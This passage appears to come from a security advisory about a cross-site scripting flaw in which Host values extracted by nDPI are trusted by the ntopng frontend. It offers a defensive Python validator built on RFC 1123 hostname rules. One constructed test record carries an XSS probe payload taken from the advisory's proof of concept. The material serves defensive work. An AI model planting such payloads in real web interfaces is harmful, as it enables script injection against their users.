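The root cause described above is that a value extracted from monitored traffic is trusted as if it were a hostname. As an added example (not ntopng or nDPI code), the Python below checks an extracted Host value against the RFC 1123 hostname grammar, an IPv4 literal or a bracketed IPv6 literal, each with an optional port, and separates records whose Host value passes from those that should only be kept as a logged raw value. The records are constructed flow tuples (client, server, extracted Host) on TEST-NET addresses, standing in for what the classifier hands the frontend; the third one carries the payload from the PoC above. Validation at ingest is a second line of defence: the frontend still has to encode the value when it renders it.

```python
"""Validate Host header values extracted from traffic before they are stored
or displayed.

Added example, not ntopng or nDPI code: the records are constructed flow
tuples (client, server, extracted Host value) standing in for what nDPI hands
the frontend; the grammar is the RFC 1123 hostname form, an IPv4 literal, or a
bracketed IPv6 literal, each with an optional port. Validation here is a
second line of defence; output encoding at render time is still required.
"""
import re

LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"   # one DNS label
HOSTNAME = rf"(?:{LABEL}\.)*{LABEL}\.?"                    # labels, optional trailing dot
IPV6_LITERAL = r"\[[0-9A-Fa-f:.]+\]"                       # RFC 3986 IP-literal
HOST_RE = re.compile(rf"^(?:{HOSTNAME}|{IPV6_LITERAL})(?::[0-9]{{1,5}})?$")


def is_valid_host_header(value):
    """True only for a syntactically valid host[:port]; anything with markup,
    whitespace or other stray characters is rejected outright."""
    if not value or len(value) > 255:
        return False
    return HOST_RE.fullmatch(value) is not None


def triage(records):
    """Split (client, server, host) records into those safe to store under the
    extracted name and those to keep only as a logged, rejected raw value."""
    accepted, rejected = [], []
    for client, server, host in records:
        bucket = accepted if is_valid_host_header(host) else rejected
        bucket.append((client, server, host))
    return accepted, rejected


# Constructed records (TEST-NET addresses, not a real capture); the third one
# carries the payload from the PoC above.
SAMPLE_RECORDS = [
    ("192.0.2.10", "198.51.100.7", "example.com"),
    ("192.0.2.10", "198.51.100.7", "example.com:8080"),
    ("192.0.2.11", "198.51.100.7", '<SCRIPT>alert("xss")</SCRIPT>'),
    ("192.0.2.11", "198.51.100.7", "[2001:db8::1]:443"),
]

if __name__ == "__main__":
    accepted, rejected = triage(SAMPLE_RECORDS)
    for client, server, host in rejected:
        print("rejected Host from %s -> %s: %r" % (client, server, host))
    print("%d accepted, %d rejected" % (len(accepted), len(rejected)))
```

Rejected values are worth keeping in a log with repr()-style quoting, since a client that sends markup in its Host header is itself a signal worth seeing, but they should never be displayed under the extracted name. Any other consumer of the nDPI host field, as the advisory notes, needs the same check.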
